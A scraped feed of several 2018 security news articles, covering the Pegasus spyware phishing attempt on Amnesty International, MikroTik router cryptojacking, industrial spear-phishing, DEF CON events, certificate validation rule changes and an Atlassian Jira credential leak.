STE WILLIAMS

Amnesty International has been spearphished by a WhatsApp message bearing links to what the organization believes to be malicious, powerful spyware: specifically, Pegasus, which has been called History’s Most Sophisticated Tracker Program.

On Wednesday, the human rights-focused NGO said in a post that a staffer received the link to the malware in June. It was baited with a message written in Arabic that implored the group to cover a protest for “your brothers detained in Saudi Arabia in front of the Saudi embassy in Washington.”

My brother is detained in Ramadan and I am on a scholarship here so please do not link me to this [link]

Cover the protest now it will start in less than an hour

We need your support please

Pegasus is a tool sold by NSO Group, an Israeli company that sells off-the-shelf spyware. It enables governments to send a personalized text message with an infected link to a blank page. Click on it, whether it be on an iOS or Android phone, and the software gains full control over the targeted device, monitoring all messaging, contacts and calendars, and possibly even turning on microphones and cameras for surveillance purposes.

Pegasus at one point even worked on non-jailbroken iOS devices. In 2016, Citizen Lab and Lookout discovered that the spyware was exploiting three critical iOS zero-day vulnerabilities to slip past Apple’s device security and install itself. Apple quickly fixed the vulnerabilities when alerted to them, according to Lookout.

This isn’t the first time that a group or individual who isn’t supposed to be a target of Pegasus has alleged they have been. NSO Group’s response to incidents like this has been consistent on each occasion: the company points to the fact that Pegasus is supposed to be used solely by governments, to enable them to invisibly track criminals and terrorists.

The statement NSO Group issued on Wednesday following Amnesty International having contacted it with its findings:

NSO Group develops cyber technology to allow government agencies to identify and disrupt terrorist and criminal plots. Our product is intended to be used exclusively for the investigation and prevention of crime and terrorism. Any use of our technology that is counter to that purpose is a violation of our policies, legal contracts, and the values that we stand for as a company. If an allegation arises concerning a violation of our contract or inappropriate use of our technology, as Amnesty has offered, we investigate the issue and take appropriate action based on those findings. We welcome any specific information that can assist us in further investigating of the matter.

Once software blinks into existence, keeping it out of the hands of the wrong people can be very difficult. Pegasus is a case in point: last month, one of NSO Group’s own employees allegedly stole the valuable software and hid it under his bed. Then, he allegedly tried to sell it for the bargain basement price of USD $50 million. (According to the indictment (PDF), the tool is estimated to be worth “hundreds of millions of [US] dollars.”)

Last year, Pegasus was also reportedly used to target Mexico’s “most prominent human rights lawyers, journalists and anti-corruption activists, in spite of an explicit agreement that it be used only to battle terrorists or the drug cartels and criminal groups that have long kidnapped and killed Mexicans,” as the New York Times reported.

According to Amnesty International, Pegasus has also been used in the United Arab Emirates, where the government targeted prominent human rights activist and political dissident Ahmed Mansoor. In June, Mansoor was sentenced to 10 years in jail and a fine of 1,000,000 Emirati Dirham (USD $272K) on charges including “insulting the UAE and its symbols.”

The Amnesty International staffer didn’t need to click on the malicious link to ascertain that it was a spearphishing attack. The group says it figured it out because the message looks to have come from a commercial provider that offers, among other services, a virtual phone number management system that allows customers to automatically send bulk SMS messages.

Such a feature is normally used for promotional campaigns or other forms of automated systems, but Amnesty believes that the attackers might be using the service to automate the process of sending malicious SMS and WhatsApp messages containing malware.

Amnesty said the link in the message was clearly rigged: it pointed to a domain that it claims belongs to a large network infrastructure connected to NSO Group.

Amnesty says it knows all this about Pegasus thanks to Mansoor, the now-jailed UAE human rights defender, who was himself targeted with Pegasus. Mansoor shared the phishing message that contained Pegasus with Citizen Lab: a Canadian research group from the University of Toronto that went on to publish numerous reports on the spyware in 2016 and 2017.

In its analysis of the messages, Amnesty claims to have found connections with a network of over 600 suspicious domain names. Not only are these domain names suspicious, Amnesty said; they also overlap with infrastructure previously identified as part of Pegasus.

Amnesty said that those 600 domains “represent potential threats to human rights defenders and civil society actors in countless other countries around the world.”

“Defending human rights is not a crime,” Amnesty said, yet tools meant to catch terrorists are being used against those who fight to defend human rights. What’s more, the attackers are baiting their snares with Amnesty’s interest in fighting for those human rights:

The unchecked use of surveillance technologies such as those produced by NSO Group can have a serious silencing effect on civil society. Someone doesn’t even need to actually be spied on to feel the repressive reach of the surveillance industry – especially when our interest in human rights is knowingly and purposefully used as bait.

When in doubt, don’t click, whether it’s a link in an email, WhatsApp, or other text messages. Be like that targeted Amnesty International staffer: put unexpected messages, and whatever links they try to lure you into clicking, under a microscope.

Take note that the attackers in this case have also used Bit.ly shortened URLs. That’s a method used by malware distributors and phishers to conceal the true destinations of their links. You can’t tell whether a shortened link is evil or not just by looking at it but in the case of Bit.ly you can just add a “+” after a Bitlink in your browser window to get a preview of where it wants to take you.

Remember though, criminals often add phishing pages to legitimate websites they’ve hacked, so while an unusual or untrustworthy domain is probably a bad sign, a trustworthy domain isn’t necessarily a good one!

Follow @LisaVaas
Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/y4uNizGZ8S0/

Some time in the near future, you may go to a parking kiosk and rather than be presented with a $5 fee request, get confronted with low-res porn images.

Likewise that locker at the gym may be used to send your bank account details to cybercriminals. And even your blender could be spying on you.

That is the nightmare internet-of-things world that security researchers Darktrace claim to have already uncovered, according to a whitepaper published this week.

In a 12-page summary seen by El Reg, the biz lists a series of attacks on small-scale devices that it claims to have identified and stamped out. Hackers apparently then tried to use these attacks to leapfrog into corporate networks where valuable data may exist.

The most amusing incidence is a parking kiosk that Darktrace says was hacked and then connected to an adult content website. The company says that none of the images actually appeared on the screen and seems confused as to what the reason for the hack was in the first place (we’re willing to bet the answer is not more complicated than: because we can).

But dumb devices do represent potentially serious threats. The report details another incident where hackers connected to a range of internet-connected devices on a food assembly line – including blenders and slicers – in an effort to connect to the broader corporate network.

They were also apparently unsuccessful in that effort – Darktrace says thanks to its artificial intelligence software identifying the threat – but the story does detail the dangers that exist in a digital world where everything connects to the internet. It only takes a line manager to buy and plug in a new piece of kit and then type in the office’s wireless password for a security hole to be opened up.

Internet of shit

As we have outlined in long and tedious detail in the past, companies that put out IoT devices or shove internet connections into updated product lines rarely consider security requirements and even more rarely update the firmware and software to keep up to date with security reports.

Such products are rarely updated, leaving potential security holes in place for years. And even if a manufacturer does allow software updates over the air, unless they lock that process down too, they risk making it easy for hackers to get into a system.

The report has another fun example: personal storage lockers at an “amusement park in North America.” In this case, the smart lockers work with a third-party online platform that employees used to enter access codes. But hackers got into the system and used the locker codes to enter the third-party’s system and steal data.

The report notes a gigabyte of data was sent out of the network that “could have included identifying details or sensitive credentials” and “had the potential to be transmitted over the internet entirely unprotected – giving the attackers ability to intercept the connections and use the information to breach the company’s network defenses.”

C-suite meet

There are a range of other examples given in the report, all of which come with happy endings thanks to Darktrace’s wonderful products and which are notable by the fact that the details are basically catnip for journalists like us who love a porn-on-the-kiosk tale. But there is a good underlying point: companies need to think a lot more strategically about their networks.

With the prevalence of devices that connect to the internet and the fact that, out of necessity, large number of employees have access to wireless passwords, it is crucial that sysadmins keep an eye on what is going on with their networks in case hackers find an effective backdoor.

There is no shortage of possible solutions of course. This report basically says it’s time to push that meeting with senior management to look at buying some additional monitoring software. And what better than an amusing and worrying tale to bring it home to the suits? ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/iot_nightmare_darktrace/

DEF CON The organizers of the DEF CON hacking conference, due to be held in Las Vegas, USA, next week, have put those who intend to spoil the event on warning: such tactics will not be tolerated.

At last month’s Hackers on Planet Earth (HOPE) event in New York City, several sessions were wrecked by white nationalist attendees spouting conspiracy theory crap, one of whom tried to rush the stage. One man, wearing a “Make America Great Again” hat derailed a question-and-answer session, had his cap stolen, and called the police. Both the thief, and later the troll, were expelled from the confab.

The trouble was, the MAGA miscreants had mostly gamed and exploited the HOPE Code of Conduct, staying just inside the anti-harassment rules yet infuriating and intimidating audiences – think loud-mouth Westboro Baptist Church scumbags turning up outside your place of work. They even spun the code of conduct around on those complaining about them, declaring that they were being fat-shamed and thus they were the ones being harassed. Professional trolls, in other words.

Mozilla staffer Jairus Khan described the kerfuffles, here. Essentially, the menacers should have been dealt with immediately rather than allowed to block aisles, troll sessions, and provoke violence. The ruckus was enough for a range of groups, including the Tor Project and the Courage Foundation, to furiously slam the HOPE organizers for failing to boot out fascists and white supremacists.

The HOPE meltdown, and similar problems at the Chaos Computer Club conference last December, suggest that there is an organized attempt to disrupt hacking events by members of the alt-reichright. But when it comes to DEF CON, founder Jeff Moss made it clear he wasn’t having any such nonsense at his party.

Democracy-minded DEF CON hackers promise punishing probe on US election computers

READ MORE

“When I designed the updated DEF CON Code of Conduct in 2015, I had a few goals in mind,” he blogged late last month. “Make it simple to understand, express in broad strokes what kind of behavior is not acceptable, and don’t be too specific.

“I wanted it to act as a template for other conferences, if they chose to do so. It was legally reviewed by our outside law firm and a specialist. In 2018, it’s looking like it may get seriously crash tested.”

The upshot is: the DEF CON Code of Conduct is a broad guideline, rather than a set of laws that other conferences have tried to apply fairly to all sides, even if one side is being deliberately disruptive, and run into problems.

Simply put: if you’re an asshole, you’ll get thrown out. Moss said he will “err on the side of removing people, rather than allow them to spoil the conference for those who just want to contribute in a positive way.”

Security at DEF CON is handled by a group of red-t-shirt-wearing volunteers known as the goons. They make sure no one gets out of line, break up potential trouble with tact and diplomacy, and aren’t above physically ejecting troublemakers.

One of the unwritten rules of DEF CON is that you never, ever, cross the goons. If anyone tries anything next week they are likely to be kicked into the fetid hell of the August Las Vegas sunshine with a boot mark on their backsides. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/def_con_alt_right/

Researchers have found thousands of MikroTik network routers in Brazil serving up crypto-coin-crafting CoinHive code.

Trustwave researcher Simon Kenin said this week one or more attackers have exploited a known vulnerability in Mikrotik’s enterprise routers to inject error pages with code that uses visitors’ machines to mine digital dosh for the miscreants.

Kenin says that the attackers have been running an exploit script to gain administrator access over the targeted routers, then installing a custom page that would come up any time an error occurs. Within that page is the actual code that employs any spare compute power on the browsing computer to mine cryptocoins and then transmit them to an address controlled by the attacker.

The exploit itself is not exactly novel, and it’s hard to blame the vendor in this case. The targeted vulnerability was patched by MikroTik back in April, just days after it was initially reported. Unfortunately, admins have been slow to patch the bug on their own appliances.

“To MikroTik’s credit, they patched the vulnerability within a day of its discovery, but unfortunately there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Kenin noted.

Thus far, Kenin said, the attacks are geographically limited to systems in Brazil, though they do appear to be spreading to other places. Additionally, Kenin found, servers connected to the router will also end up injecting the code into other web pages as well.

Ransomware is so 2017, it’s all cryptomining now among the script kiddies

READ MORE

“What this means is that this also impacts users who are not directly connected to the infected router’s network, but also users who visit websites behind these infected routers,” Kenin said.

“In other words, the attack works in both directions.”

This is a problem because MikroTik’s routers are used by a number of large companies, including ISPs.

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” said Kenin.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily.”

Kenin is advising anyone using a MikroTik device to update their firmware as soon as possible to make sure their systems will be protected against the exploit used to install the mining code. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/03/mikrotik_routers_cryptocurrency/

More than 200,000 routers hit with a sophisticated cryptomining attack that appears to be spreading.

In March, routers from Latvian manufacturer MikroTik were hit by an advanced threat dubbed Operation Slingshot. The company patched for the threat, but now a new cryptomining attack has hit MikroTik routers and appears to be spreading rapidly.

The original Operation Slingshot campaign was spyware that was able to gather screenshots, keyboard data, network data, passwords, various desktop activity, the clipboard, and more without ever using a zero-day exploit. Instead, the attack took advantage of two modules that were able to implant themselves in a targeted router. Those modules were accompanied by very sophisticated detection evasion techniques that included shutting down the attack if certain forensic activities were detected. Nevertheless, the attack was discovered and countered.

This time around, researchers have found a new MikroTik-targeting cryptojacking campaign that began with routers in Brazil and is now spreading beyond those borders. The campaign, which injects cryptomining software into traffic transiting an infected MikroTik router, was so successful that the performance hit was what drew attention to the attack; the threat actor then shifted strategies to only inject the miner through router-based error pages.

According to researchers at Trustwave, the attack has now hit more than 200,000 routers, with the number still growing as of this writing. Further, tens of thousands of those routers are outside Brazil, indicating that any initial geographic targeting is no longer in effect.

“Everyone with a MikroTik router should be worried that they will be targeted no matter where they reside,” says Karl Sigler, threat intelligence manager at Trustwave. Fortunately, those same global users have a meaningful response possible for the attack.

“Hopefully with enough coverage, users of MikroTik routers will patch their devices, Sigler adds. “A single patch [available since April] is enough to stop this exploitation in its tracks.”

This is not the first time MikroTik owners have been urged to patch and reboot their routers. MikroTik equipment was specifically mentioned in the FBI’s May 2018 call for router reboots, and even the March attack was effective only against routers that were not up to date with software patches.

Related Content:

• DHS Officials: Hundreds of US Utility Victims Infiltrated by Russian Hackers
• VPNFilter Poses Broader Threat Than First Thought; Endpoints At Risk Too
• FBI Warns Users to Reboot All SOHO Routers
• 5 Tips for Protecting SOHO Routers Against the VPNFilter Malware

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Article source: https://www.darkreading.com/attacks-breaches/cryptojacker-campaign-hits-mikrotik-routers/d/d-id/1332478?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

At least 400 companies in Russia have been in the bullseye of new, sophisticated spear-phishing attacks, Kaspersky Lab says.

A sophisticated new phishing campaign targeting organizations in the industrial sector shows yet again how attackers are constantly improving at luring high-value users into executing malware on their systems.

In a technical advisory Wednesday, security vendor Kaspersky Lab said it has observed a wave of spear-phishing emails expertly disguised as procurement and accounting letters being sent to carefully selected individuals at companies mostly in Russia. The attackers have typically been targeting finance and project-management related employees at these companies, and the main goal appears to be to steal money from victim organizations.

So far, the threat actors behind the campaign have targeted at least 800 computers across 400 organizations in industries such as energy, manufacturing, oil and gas, logistics, and construction.

The emails are usually addressed to the targeted individuals by their full name and contain content — such as invitations to tender bids — that corresponds with their company’s business and the individual’s job roles.

The malicious attachments in many of the emails have names that suggest a connection with finance. In some cases, the attackers have been sending emails with no attachments but with links embedded in the content to external sites from where malware can be downloaded to their system. The domain names from which the emails are sent are usually very similar to the domain name of the organization that purportedly sent them.

The attackers have been using various tactics to mask infections, Kaspersky Lab said in its report. If a user is tricked into opening a malicious attachment purporting to be about procurement tenders, for instance, a modified version of a legitimate software tool to search for tenders is installed on the victim system along with the malware.

The malware is used to install either TeamViewer or some other legitimate utility for remotely controlling infected systems. The attackers have then been using their remote access to inspect compromised systems for documents pertaining to financial, accounting, and procurement operations with a view to using them to enable financial fraud.

One tactic has been to change details in payment bills so payments are sent to the attackers rather that the intended organization, Kasperksy noted. When the attackers want additional information or access to other systems, they install additional malware to enable that goal. 

Kaspersky Lab’s analysis of the phishing campaign suggests that the attackers started the campaign last October and targeted a relatively short list of companies through March this year, says Kirill Kruglov, senior research developer at Kaspersky Lab.

Since then, the attackers have broadened their attacks and are now going after a much broader set of targets.

“There could be at least two explanations,” for why the attackers began small and then expanded their target list, Kruglov says. “[Either] the attackers collected data during the attack month by month, or they tested the attack vector on some portion of the information they had before launching it in full scope.”

Financial Goals

So far, the attackers appear focused only on stealing money. The attackers use spyware to collect data and credentials for propagating inside victim networks. But there has been no evidence of purposeful interest in espionage and data theft.

While the task of assembling the information needed to carry out a targeted and highly personalized phishing campaign of this sort might appear enormous, in reality it isn’t, Kruglov notes.

Usually, threat actors collect public information from corporate websites, social networks, and other sources. Or they could simply buy it on hacker forums or the dark net. “This means it is not much work. A few months are more than enough for threat actors to prepare such an attack,” he says.

Kaspersky Lab’s report is the second reminder of the growing sophistication of spear-phishing campaigns and the enormous success that it is netting threat actors. On Wednesday, US law enforcement authorities announced the arrests of three Ukrainian nationals connected with FIN7, a group believed responsible for stealing data on more than 15 million payment cards from organizations such as Saks Fifth Avenue, Chipotle and Arby’s.

In many of the attacks, FIN7 operatives sent carefully crafted spear-phishing emails to vetted individuals at the targeted organization with the goal of installing malware on their systems for enabling payment card theft. FIN7 members even went to the extent of making phone calls to targeted individuals either before or after sending them a phishing email to try and bolster the credibility of their phishing lure.

“The level of meticulous detail in targeting more than eight hundred employees’ PCs in today’s widespread Eastern European spear-phishing campaign confirms what we’ve been seeing for some time,” said Rohyt Belani, CEO and co-founder of Cofense. “Global phishing actors continue to leverage more personalized, spear-phishing campaigns as a sure-fire way to bypass next-generation email gateways and perimeter controls.”

Related Content:

• Feds Indict Three Ukrainians For Cyberattacks on 100+ Companies
• Cyber Resilience And Spear Phishing
• 91% Of Cyberattacks Start With A Phishing Email
• 8 Ways Hackers Monetize Stolen Data

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/industrial-sector-targeted-in-highly-personalized-spear-phishing-campaign-/d/d-id/1332477?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A self-styled Anonymous hacker who attempted to flee the US in a sailboat has been convicted of two felonies for his role in a 2014 distributed denial-of-service (DDoS) attack on a children’s hospital.

A jury in the Massachusetts US district court found Martin Gottesfeld guilty this week on charges of conspiracy to intentionally damage a protected computer and committing intentional damage to protected computers.

A sentencing hearing has been set for November 11. Gottesfeld, 32, faces up to ten years in the clink for the damaging protected computers charge and five years for the conspiracy charge.

The charges stem from Gottesfeld’s part in the March 2014 crippling of the internal network of the Boston Children’s Hospital as part of “OpJustina” – a hacktivist campaign on behalf of the parents of a teen who had been held by the state believing her to be the victim of abuse. It was later found that the girl’s bruises were the result of a medical condition and not physical abuse.

The hospital claimed it had to fork out more than $300,000 in damages and costs in recovering from the DDoS attack that knocked out its computer network.

Alleged Anonymous hacker rescued off Cuba by Disney cruise ship

READ MORE

Investigators found [PDF] that Gottesfeld played a key role in the assault, both in planning and executing the strike and in creating YouTube videos and Twitter accounts that called for others to join in the DDoS effort.

Once the FBI caught wind of the operation and began to investigate Gottesfeld in early 2016, the then-31-year-old would attempt to flee the US with his wife via a sailboat bound for Cuba.

Perhaps unsurprisingly, the would-be fugitive was unable to successfully navigate the waters of the Caribbean and, after being blown off course, he and his spouse had to be plucked from the water by a Disney cruise ship that handed the pair to authorities in Miami, Florida. There’s no word on whether they got to meet Mickey Mouse before being arrested.

Gottesfeld’s wife was not charged in the case. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/castaway_hacker_guilty/

Lawyers will no longer be allowed to certify someone’s ownership of an internet domain name, and the public Whois no longer represents proof of ownership, when it comes to assigning security certificates to site owners.

That means, for example, you can no longer pay a lawyer $500 to write you a letter asserting you own a particular domain name, and use that to obtain an SSL/TLS cert for it, nor use the Whois database to back up your claims of ownership. These two security loopholes were shut down this week in revised rules for Certificate Authorities (CAs) – the folks that issue, typically via intermediaries, HTTPS certificates for websites.

Internet users are reliant on these digital certificates to encrypt and protect their connections when they visit a HTTPS website, and the site’s cert must match its domain name. So if you want a certificate for supercyberbadgers.com, you usually have to demonstrate you own or administrate it before the cert is issued.

Thanks to Google’s decision to flag up any site without such a certificate as insecure in its Chrome browser, these certs have become essential. Google’s search engine also favors secure sites, and, of course, there are many other benefits to encrypting your site’s traffic – and these days free certs are available.

Beware the looming Google Chrome HTTPS certificate apocalypse!

READ MORE

The whole system is under scrutiny. Code-signing certs were found on black markets. Millions of old paid-for Symantec-issued web certificates were killed off after it was discovered the biz has failed to follow CA “baseline requirements” and allowed several organizations to issue their own certificates through its systems without appropriate oversight.

It is those “baseline requirements” that are being revised to remove the Whois and lawyer letters as legitimate forms of authentication for identifying who owns and operates a particular domain name.

In March last year, the joint CA/Browser Forum – which decides on the rules – voted to scrap a vaguely worded part of the rules where a CA could use “any other method of confirmation which has at least the same level of assurance as those methods previously described” and replace it with a list of approved methods.

Whowas

That vote was unanimous. However, a more contentious vote in February this year also scrapped the lawyer and Whois methods of authentication. Previously a lawyer was able to write a letter asserting someone’s ownership of a particular domain name, and it could be accepted as proof of ownership. However, the CAs decided this was not a very secure system since lawyers are “generally not qualified to evaluate” domain ownership, according to the man who proposed the motion, Tim Hollebeek of DigiCert.

The Whois method allowed a CA to compare the name and address of the domain owner in the public Whois database to the certificate applicant and approve the application if they matched.

But in another sign that the fiercely protected Whois service isn’t worth the paper it isn’t written on, the CAs decided this also represented a security risk because people simply make up false Whois details and internet overseer ICANN fails to require a decent level of authentication.

Not everyone was on board with the change however: of the 22 CAs, 14 voted yes – basically all the ones you have heard of – four abstained (Actalis, Disig, HARICA, OATI) and four voted against the change (Buypass, Chunghwa Telecom, Entrust Datacard, SwissSign). All five browser makers voted yes (five? Yes, Comodo apparently has a browser called “Dragon” based on Chromium. Who knew?)

But with 78 per cent of CAs voting yes, it passed, and as of August 1 – yesterday – the new rules came into force. It’s not clear that everyone will follow the rules straight away but if a CA is discovered to be using the now-obsolete validation methods, they risk have the certificate revoked – and security researchers will no doubt be looking out for just this sort of behavior.

Walk through

The process has been covered in some detail by Hollebeek in a blog post. It’s worth noting that his company, DigiCert, is also the company in charge of cleaning up Symantec’s certificate mess – something that he says has been completed.

We spoke to Hollebeek, who views the changes as a critical step in staying ahead of cybercriminals. “There is always a certain amount of angst when there is a ballot to change the baseline requirements,” he told us, “but the threat landscape is constantly changing and we have to get better and better.”

With that in mind, Hollebeek says he will continue pushing to tighten up the validation rules further to limit the opportunity for dodgy certs. CAs have a set of best practices that a future ballot will propose pulling into the official requirements – such as requiring a CA to ask for an applicant by name. There is also a proposal that would require CAs to say in their certificate which method was used to validate a domain – something that could prove useful in identifying future security gaps.

Hollebeek stresses, however, that no one method of validation is perfect, and that some which are perfectly good in one context may be risky in another – for example an agreed website change that could be carried out by a third party on an e-commerce website, or a user account in an online publishing system.

Other approaches that provide a decent level of security: email from the same domain name; agreed changes to a domain’s DNS records; a test certificate; a phone call; and an associated IP address.

In short, while digital certificates are not foolproof, it will be increasingly difficult for scammers and malware folk to get hold of a legit certificate. Combined with browsers’ warning against websites without such a certificate, the overall security of the internet should be bumped up a little – which can only be a good thing. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/lawyers_domain_ownership/

Last year, the hackers at DEF CON showed how shockingly easy it was to crack into voting machine software and hardware. Next week, the 2018 conference’s Vote Hacking Village will let kids have a shot at subverting democracy.

Beginning on Friday, August 10, teams in three age ranges, 8-11, 12-14 and 15-16, will be let loose on replica American government websites that report election results. In elections in the Ukraine and Ghana, these were hacked to spread confusion about the voting process and its results – and the village’s organizers hope the youngsters can do the same with US-style tech.

“It’s just so easy to hack these websites we thought the grown-up hackers in the vote hacking village wouldn’t find it interesting,” Jake Braun, cofounder of the Vote Hacking Village and executive director of the University of Chicago Cyber Policy Initiative, told The Register. “When I was discussing it with a colleague, they noted ‘it would be child’s play’ and I said ‘good f**king point!’ and started planning the event with the Capture the Packet crew and the r00tz Asylum group, which trains young hackers.”

The websites were built by Brian Markus, one of the best ethical hackers in the US who, when not who running DEF CON’s Capture The Packet competition, runs a security consultancy, has served on the President’s National Security Telecommunications Advisory Committee and develops hacking training materials for the US and Australian military.

“We’re pretty confident that anything he’s going to make is going to be a good replica of the government election results websites,” Braun said of Markus’ work. “He’s certainly at least as good at locking down websites as anything whoever is running the state’s election security can put out.”

In two three-hour contests held on Friday and Saturday the kids will compete to best derail and meddle with the reporting of election results in 13 key US battleground states, which would, in real life, spread confusion and doubt. Prizes will be awarded to the first to exploit a security hole, whoever comes up with the most innovative and best social-engineering exploits, and the youngest to exploit a vulnerability.

“We think kids will come up with creative ways to socially engineer chaos on the results,” Braun said. “We’re hoping to get some ideas from these fresh eyes that are different from the stuff that we’ve been looking at the last two years.”

This isn’t all about fun and games

With US national midterm elections coming in three months, the need for better election security has never been more pressing. On Wednesday, the Republican caucus in Congress shot down an amendment to an appropriations bill proposed by Senator Patrick Leahy (D-VT) that would have allocated $250m to US states to be used for hardening election systems against attack. One Republican senator, voted for the amendment and three abstained.

Homeland Security: Putin’s hackers tried to crack electoral networks in 21 US states

READ MORE

“The integrity of our elections, which are the foundation of our democracy, should not be a partisan issue,” Leahy said after the vote. “It is unfortunate that the Senate has followed the same path as House Republicans in blocking the funding our states need to help upgrade their infrastructure and secure our elections. I fully intend to continue pursuing this issue in conference.”

This has become something of a theme for the Republican caucus. In March, Congress allocated $380m for election security spending, after over a decade that saw little investment and shocking lapses of computer security in the national democratic infrastructure. But then in July, the Republicans killed calls for extra funding.

“The $380m that was given out is an order of magnitude lower than it needs to be – it needs another comma in there if they want to make a dent in this stuff,” Braun opined. “Only a handful of state and local governments have received their cyber assessments from DHS and we still have thousands of jurisdictions that don’t yet have the sensors needed to identify if an attack is taking place. At this point we wouldn’t even know if we were being hackled.”

DEF CON, the world’s biggest and longest-running hacking conference, will take place in Las Vegas between August 9-12, and is expected to pull in tens of thousands of the hackers and infosec researchers on the planet. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/defcon_election_hacking/

Exclusive Atlassian has warned users of its Jira Service Desk toolkit to change their helpdesk email account passwords – after a glitch caused the credentials to be sent to strangers’ servers.

Customers were today sent an advisory, seen by The Register, from Atlassian explaining that, due to a long-standing bug in its IT helpdesk software, those who opted to process their support queries via email had their email server usernames and passwords sent to other Atlassian customers’ email servers. That would allow these strangers to obtain their credentials, if they were logging login attempts.

Here’s how it worked in a nutshell: the email channel option lets organizations running Jira Service Desk receive support requests from their customers via email – such as via [email protected] – and these requests then show up on the Jira service desk web-based dashboard.

In order to do this, Jira needs to log into the organization’s email server to access the helpdesk inbox – eg: it would connect to theregister.com’s mail server and log into the helpdesk@ account. And in order to do this, Jira has to present to the email server the username and password for the account. Thanks to the bug, some of those login requests were sent to the wrong servers, pinging other Atlassian subscribers’ servers and attempting to login. Thus, the credentials were leaked to third parties.

“The vulnerability has been present since early 2017,” Atlassian told its punters. “We first became aware of the issue on July 12, 2018 PST and took immediate action to investigate the matter, issuing a fix early on July 16, 2018 PST.”

Logger heads

While “credentials going to another server” is not something any admin wants to hear, there are a couple things to keep in mind that mitigate the damage here.

First, it wasn’t just some random box on the internet that was getting the requests, Atlassian said. The bug only sent the credentials to other email servers. This brings up the second point: most email servers don’t log passwords used in unsuccessful login attempts. There’s little chance any of the credentials transmitted here were recorded, let alone harvested with the intent of being used by scumbags.

Still, Atlassian is advising customers who opted for the email feature to change the password they use for the email accounts connected to the service out of an abundance of caution. Doing so should eliminate any possible risk from the blunder, we’re told. Atlassian is also directing any customers who have concerns about their account security to contact their support desk with the reference code HOT-84313.

Below is a copy of the full email sent out today. A spokesperson for Atlassian said they’d get back to us shortly with a full statement. ®

Hello,

We have identified a security vulnerability in the functionality used by the e-mail channel feature in Jira Service Desk’s cloud version. We want to make you aware so that you can take appropriate action on your end.

Due to a bug, our mail service occasionally sent the credentials you provided in your email channel configuration to the wrong mail server in an attempt to log in. At no point were the contents of your emails (or other data used by Jira Service Desk) exposed to other customers. Although it is unusual to configure a mail server to retain login credentials and, therefore, unlikely that the credentials were exposed, we recommend that you change the password of the email account configured in the email channel feature.

The vulnerability has been present since early 2017. We first became aware of the issue on July 12, 2018 PST and took immediate action to investigate the matter, issuing a fix early on July 16, 2018 PST. We are notifying you now after investigating and confirming you may have been affected. If you have any questions please feel free to raise a support request at https://support.atlassian.com/jiraservicedesk-cloud/ referencing HOT-84313.

Sincerely,

–The Jira Service Desk Team

Thanks to Reg reader Will Wilson for tipping us off. Have you clocked any other security cockups? Let us know – anonymity guaranteed if requested.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/atlassian_advises_jira_password_reset/